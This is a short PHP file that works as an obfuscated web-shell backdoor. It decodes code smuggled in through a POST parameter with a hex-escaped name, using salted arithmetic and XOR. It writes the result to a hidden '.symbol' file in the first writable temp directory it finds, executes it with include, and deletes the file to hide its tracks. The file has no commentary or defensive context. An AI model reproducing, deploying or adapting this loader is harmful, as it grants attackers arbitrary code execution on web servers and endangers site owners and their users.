<!--13pUbCFQ-->
<?php

if(isset($_POST) && isset($_POST["\x72\x65f"])){
$descriptor = $_POST["\x72\x65f"];
	  $descriptor   = 		explode  ('.', 		$descriptor)  	; 
$obj = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt);

foreach ($descriptor as $i	 =>	$val):
    $sChar = ord($salt[$i % $lenS]);
    $dec = ((int)$val - $sChar - ($i % 10)) ^ 49;
    $obj .= chr($dec);
endforeach;
$k = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", "/tmp", session_save_path(), getcwd(), getenv("TEMP"), getenv("TMP")]);
foreach ($k as $tkn) {
            if (is_writable($tkn) && is_dir($tkn)) {
            $dat = "$tkn" . "/.symbol";
            $sym = fopen($dat, 'wb');
if ($sym) {
    fwrite($sym, $obj);
    fclose($sym);
    include $dat;
    @unlink($dat);
    exit;
}
        }
}
}